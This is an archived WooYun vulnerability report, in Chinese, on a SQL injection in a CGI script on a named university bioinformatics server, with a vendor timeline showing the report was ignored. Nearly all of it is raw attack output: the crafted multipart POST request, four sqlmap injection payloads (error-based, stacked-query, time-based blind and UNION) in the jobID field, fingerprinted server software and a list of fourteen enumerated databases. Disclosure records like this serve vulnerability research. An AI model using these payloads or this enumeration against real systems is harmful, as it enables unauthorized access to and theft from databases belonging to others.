乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-02: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开
POST /cgi-bin/blast/degjob.py HTTP/1.1Content-Length: 489Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IPKTBHNSNJHost: tubic.tju.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*-------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="jobID"*-------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="session"1f9a2-------AcunetixBoundary_IPKTBHNSNJ--
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="jobID"' AND (SELECT 9812 FROM(SELECT COUNT(*),CONCAT(0x716b716271,(SELECT (ELT(9812=9812,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wnad'='wnad-------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="session"1f9a2-------AcunetixBoundary_IPKTBHNSNJ-- Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: -------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="jobID"';(SELECT * FROM (SELECT(SLEEP(5)))DyUH)#-------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="session"1f9a2-------AcunetixBoundary_IPKTBHNSNJ-- Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: -------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="jobID"' AND (SELECT * FROM (SELECT(SLEEP(5)))XrXc) AND 'NUgu'='NUgu-------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="session"1f9a2-------AcunetixBoundary_IPKTBHNSNJ-- Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: -------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="jobID"' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x4361706663516b504468,0x717a6b6271),NULL,NULL,NULL-- -------AcunetixBoundary_IPKTBHNSNJContent-Disposition: form-data; name="session"1f9a2-------AcunetixBoundary_IPKTBHNSNJ-----web server operating system: Linux SuSE 10.2web application technology: Apache 2.2.3back-end DBMS: MySQL 5.0available databases [14]:[*] aoric[*] deori[*] drdd[*] egdb[*] egdb_bak[*] gregdb[*] gregdb2[*] information_schema[*] mysql[*] oricdb[*] orivdb[*] pdeg[*] test[*] zcurvedb
危害等级:无影响厂商忽略
忽略时间:2015-12-07 15:46
漏洞Rank:4 (WooYun评价)
暂无